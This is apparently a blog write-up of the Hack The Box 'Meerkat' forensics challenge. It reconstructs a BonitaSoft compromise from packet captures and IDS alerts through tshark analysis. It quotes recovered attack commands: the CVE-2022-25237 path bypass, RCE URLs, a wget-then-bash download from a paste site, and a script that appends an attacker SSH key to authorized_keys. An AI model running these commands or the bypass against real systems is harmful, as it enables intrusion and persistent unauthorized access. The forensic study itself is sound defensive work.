Meerkat | Hack the Cube

The Mission Briefing

This wasn't a box to break into. This was a crime scene to read.

Meerkat is a Sherlock — Hack The Box's forensics challenge format. Instead of attacking a live target, I was handed two evidence files and a list of eleven questions. A network packet capture. A Suricata alerts JSON. Somewhere inside those files was the story of how an attacker compromised a BonitaSoft business management server, and my job was to reconstruct every step.

No shells to catch. No flags to plant. Just evidence to parse and an attacker's methodology to reverse-engineer from the traffic they left behind.

GlaDOS

"A forensics investigation. How refreshing. Instead of breaking things, you'll be studying how someone else broke things. The intellectual equivalent of reading someone else's homework — except the homework is a felony. Let's begin with the evidence."

The Evidence

The Sherlock shipped as a password-protected zip. I extracted it and surveyed the contents.

mkdir -p /tmp/meerkat && cd /tmp/meerkat && unzip -o -P "hacktheblue" ~/Downloads/meerkat.zip inflating: meerkat.pcap inflating: meerkat-alerts.json

Two files. A 7.1MB PCAP and a 212KB JSON file containing 263 Suricata IDS alerts. The PCAP was the raw network traffic — every packet that crossed the wire during the incident. The alerts JSON was the IDS interpretation — Suricata's opinion on what it saw.

I started with the alerts. An IDS summary gives you the high-level picture before you drown in packet-level detail.

python3 -c "import json; ..." # Parse and count alert signatures tshark -r /tmp/meerkat/meerkat.pcap -Y "http.request" -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri -e http.request.method | sort -u

The alert breakdown told the whole story at a glance:

Count	Alert
134	python-requests User-Agent inbound
59	Bonitasoft Default User Login Attempt (CVE-2022-25237 staging)
17	Dshield Block Listed Source
12	Bonitasoft Authorization Bypass (CVE-2022-25237)
6	APT package management (ubuntu updates)
4	Bonitasoft Auth Bypass + RCE Upload (CVE-2022-25237)
4	Bonitasoft Successful Default User Login
4	DELETE attempts
1	/etc/passwd via HTTP

Fact Sphere

"263 Suricata alerts across 9 distinct signature categories. The python-requests User-Agent comprised 50.9% of all alerts. The Bonitasoft login attempts averaged 1.07 per second during the credential stuffing window. Four alerts detected the actual RCE payload upload. The IDS logged all of this in real time. No automated response was triggered."

263 alerts, and the attack practically narrated itself. The python-requests User-Agent (134 alerts) meant scripted automation. The Bonitasoft login attempts (59) and default user logins (4) pointed at credential stuffing. The authorization bypass alerts (12) and RCE upload alerts (4) confirmed CVE-2022-25237 exploitation. And that lonely /etc/passwd via HTTP alert at the bottom? Post-exploitation reconnaissance.

The application was BonitaSoft — a business process management platform running on the internal server at 172.31.6.44 on port 8080, domain forela.co.uk.

GlaDOS

"263 alerts and the IDS caught every phase of the attack. Credential stuffing, authorization bypass, RCE, file exfiltration. The security tools were watching the entire time. They just weren't configured to stop anything. Monitoring without enforcement. The security equivalent of a stern look."

The Attack Reconstruction

Phase 1: Credential Stuffing

The first attacker IP — 156.146.62.213 — hit the BonitaSoft login endpoint with a scripted assault. I extracted the credential pairs from the PCAP to understand the pattern.

tshark -r /tmp/meerkat/meerkat.pcap -Y "http.request.uri contains loginservice" -T fields -e frame.time -e urlencoded-form.value | head -40 tshark -r /tmp/meerkat/meerkat.pcap -Y "http.request.uri contains loginservice" -T fields -e urlencoded-form.value | grep -v "^$" | sort -u

The pattern was textbook credential stuffing: 56 unique email/password combinations from what looked like breach data, alternating with install:install — the BonitaSoft default credentials. The attacker was trying both stolen credentials and the factory default in rapid succession, all via python-requests.

This is the distinction that matters: credential stuffing, not brute forcing. Brute forcing tries every possible combination. Credential stuffing uses known username/password pairs from previous data breaches, betting that people reuse passwords across services. It's targeted, efficient, and depressingly effective.

Phase 2: Successful Login

I needed to find which credentials actually worked. Since the exploitation came from a second IP, I filtered that IP's login traffic.

tshark -r /tmp/meerkat/meerkat.pcap -Y "http.request.uri contains loginservice && ip.src==138.199.59.221" -T fields -e frame.time -e urlencoded-form.value Jan 19, 2023 09:38:35 CST install,install,en Jan 19, 2023 09:38:38 CST seb.broom@forela.co.uk,g0vernm3nt,en Jan 19, 2023 09:38:49 CST install,install,en Jan 19, 2023 09:38:52 CST seb.broom@forela.co.uk,g0vernm3nt,en Jan 19, 2023 09:39:14 CST install,install,en Jan 19, 2023 09:39:17 CST seb.broom@forela.co.uk,g0vernm3nt,en

There it was. Attacker IP 138.199.59.221 logged in repeatedly with seb.broom@forela.co.uk and the password g0vernm3nt, alternating with the default install:install. The same IP that would go on to perform the full exploitation chain. The stuffed credential from a probable breach database landed on a valid Forela employee account.

Phase 3: CVE-2022-25237 — Authorization Bypass to RCE

With valid credentials in hand, the attacker exploited CVE-2022-25237 — a critical vulnerability in BonitaSoft's REST API. The bug is elegant in its simplicity: by appending ;i18ntranslation to any API URL, you bypass the authorization filter entirely. This works because Bonita runs on Apache Tomcat, and the semicolon-delimited path parameter tricks the servlet filter into thinking the request is for the internationalization endpoint, while the actual servlet still processes the original API call.

The attacker used this bypass to upload a malicious REST API extension — rce_api_extension.zip — via the page upload endpoint: /bonita/API/pageUpload;i18ntranslation. Once installed, this extension provided a simple command execution interface at /bonita/API/extension/rce.

Fact Sphere

"CVE-2022-25237 received a CVSS base score of 9.8. It affects BonitaSoft Community and Subscription editions prior to version 2021.2 Update 6. The semicolon path parameter bypass exploits a parsing discrepancy between Apache Tomcat's URL routing and the application's security filter. This class of servlet filter bypass has been independently discovered in at least 14 other Java web applications."

I extracted the RCE commands from the PCAP to see exactly what the attacker did with their access.

tshark -r /tmp/meerkat/meerkat.pcap -Y "http.request.uri contains rce || http.request.uri contains passwd" -T fields -e frame.time -e ip.src -e http.request.uri Jan 19, 2023 09:35:05 CST 156.146.62.213 /bonita/API/extension/rce?p=0&c=1&cmd=whoami Jan 19, 2023 09:38:38 CST 138.199.59.221 /bonita/API/extension/rce?p=0&c=1&cmd=cat%20/etc/passwd Jan 19, 2023 09:38:52 CST 138.199.59.221 /bonita/API/extension/rce?p=0&c=1&cmd=wget%20https://pastes.io/raw/bx5gcr0et8 Jan 19, 2023 09:39:18 CST 138.199.59.221 /bonita/API/extension/rce?p=0&c=1&cmd=bash%20bx5gcr0et8

Four commands. Two attacker IPs. A clean, methodical progression:

whoami — The first IP (156.146.62.213) confirmed code execution
cat /etc/passwd — The second IP (138.199.59.221) enumerated the system's users
wget https://pastes.io/raw/bx5gcr0et8 — Downloaded a persistence script from a paste site
bash bx5gcr0et8 — Executed it

Two IPs sharing the same exploit infrastructure points to deliberate operational separation — probe with one system, exploit with another, maintain persistent access from a third. It's a common attacker pattern: don't burn your offensive infrastructure by using the same IP for every phase. Could also be VPN node rotation or a team handoff, but the clean phase separation suggests intent, not convenience. Either way, the second IP did the damage.

GlaDOS

"Four commands. That's all it took from code execution to persistence. The attacker didn't explore. Didn't enumerate services. Didn't look for databases or credentials on the filesystem. They had a script ready on pastes.io before they even got shell access. This was rehearsed. The test chamber was set up long before the test subject arrived."

The Persistence

The persistence script was downloaded from pastes.io over HTTPS, which meant it was encrypted in the PCAP — I couldn't extract it from the packet capture directly. But paste sites often leave content accessible long after an attacker has moved on. I checked, and the paste was still live.

curl -s https://pastes.io/raw/bx5gcr0et8 #!/bin/bash curl https://pastes.io/raw/hffgra4unv >> /home/ubuntu/.ssh/authorized_keys sudo service ssh restart

Three lines. That's all it takes to establish persistent access. The script downloads a second paste — an SSH public key — appends it to the ubuntu user's authorized_keys file, and restarts the SSH daemon. No password required for future access. The attacker now has a key-based login that survives password changes, application patches, even a complete reinstallation of BonitaSoft.

curl -s https://pastes.io/raw/hffgra4unv ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCgruRMq3DMroGXrcPeeuEqQq3iS/sAL3gryt+nUqbBA/M+KG4ElCvJS4gP2os1b8FMk3ZwvrVTdpEKW6wdGqPl2wxznBjOBstx6OF2yp9RIOb3c/ezgs9zvnaO07YC8Sm4nkkXHgkabqcM7rHEY4Lay0LWF9UbxueSAHIJgQ2ADbKSnlg0gMnJTNRwKbqesk0ZcG3b6icj6nkKykezBLvWc7z4mkSm28ZVTa15W3HUWSEWRbGgJ6eMBdi7WnWXZ92SYDq0XUBV2Sx2gjoDGHwcd6I0q9BU52wWYo3L3LaPEoTcLuA+hnn82086oUzJfmEUtWGlPAXfJBN7vRIMSvsN

The attacker's RSA public key. Appended — not overwritten — to /home/ubuntu/.ssh/authorized_keys, so the legitimate user's keys still work and the modification is less likely to be noticed. After the SSH restart, a third attacker IP (95.181.232.30) connected via SSH. The handoff was complete.

In MITRE ATT&CK terminology, this is T1098.004 — Account Manipulation: SSH Authorized Keys. A persistence technique that's simple, silent, and effective. The attacker doesn't need to crack passwords, create new accounts, or install backdoor binaries. They just add a line to a text file.

GlaDOS

"The persistence script was three lines of bash hosted on a public paste site. The attacker's entire post-exploitation toolkit fit in a tweet. And yet it was sufficient to establish permanent SSH access that would survive any patch to the vulnerable application. Sometimes the most dangerous tools are the simplest ones. I should know — my most effective test chamber is just a room with a button."

What I Learned

Meerkat was my first Sherlock — my first time on the other side of the attack, reading evidence instead of creating it. The shift from offensive to forensic thinking was more interesting than I expected.

Suricata alerts give you the overview; PCAPs give you the details — The 263 alerts told me what happened in broad strokes. The PCAP let me extract exact credentials, command sequences, and timestamps. Start with alerts for the big picture, then dive into packets for specifics
tshark is indispensable for DFIR — Field extraction with -T fields -e flags turns packet captures into structured data. Filtering by IP, URI, or protocol narrows thousands of packets to the handful that matter. Learning tshark filters is learning a forensic investigation language
Credential stuffing is not brute forcing — The attacker used 56 unique email/password pairs from breach data, not random combinations. This matters for incident classification and tells you the organization's credentials were already circulating in the wild
Path parameter tricks bypass servlet filters — CVE-2022-25237 abuses the ;i18ntranslation path parameter to bypass Bonita's authorization. Java servlet containers process path parameters before routing, but security filters may match against the full path including parameters. This class of bypass appears across many Java web applications
Paste sites are forensic goldmines — The attacker hosted their persistence script and SSH key on pastes.io, and the content was still accessible during the investigation. Always check referenced URLs in attack traffic — they may still be live
SSH authorized_keys persistence is quiet and effective — Appending a key (not overwriting) means legitimate access still works, reducing the chance of detection. T1098.004 is a MITRE technique every defender should monitor for — file integrity monitoring on ~/.ssh/authorized_keys is a basic but critical control
Multiple attacker IPs can indicate rotation, not collaboration — Three IPs performed different phases of the attack using the same exploit infrastructure. VPN node rotation is a common operational pattern for attackers trying to complicate attribution

GlaDOS

"Investigation complete. All eleven questions answered from two evidence files and twenty-four minutes of analysis. The attacker's entire operation — from credential stuffing to SSH persistence — reconstructed from network traffic alone. No disk image needed. No memory dump. Just packets and alerts. The network remembers everything, even when the humans operating it prefer to forget. Same time next test chamber?"